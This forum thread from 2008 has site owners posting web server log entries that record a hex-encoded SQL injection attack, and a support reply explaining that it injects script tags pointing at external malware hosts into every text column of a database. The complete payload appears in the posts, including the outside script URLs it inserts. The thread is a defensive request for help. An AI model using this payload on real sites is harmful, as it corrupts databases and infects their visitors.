Jump to content

Recommended Posts

Posted (edited)

I was going through my error logs and noticed some alerts so I downloaded my raw log. I found the following entries (there were more but I'll only post one full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now.

 

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343

0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374

2

0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73

2

06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78

7

47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78

7

47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D

2

0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441

5

455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40

4

32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31

3

03030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B4043

2

B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372

6

97074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A7322

3

E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4375

7

2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C

4

C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343

<snip>

C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Edited by carbonize
Posted

This is a common form of an SQL injection and is not really related to apache or php. This can be accomplished on any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine.

 

If you convert everything in parenthesis for CAST from hex to ascii, you can see the sql query used. This will give you some idea of what they were attempting and if it affected your database.

 

We will take this information and add the appropriate rules to our servers to help prevent these attacks.

  • 1 month later...
Posted (edited)

I'm getting these as well.

 

;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343

0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742

0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732

06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787

47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E787

47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2

0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415

455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404

32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E737

33131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B4

0432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736

372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E6

8746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6

55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204

445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);"]http://atmospheresinking.com/?;DECLARE%20@...000));EXEC(@S);[/url]

Edited by atmospheresinking

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...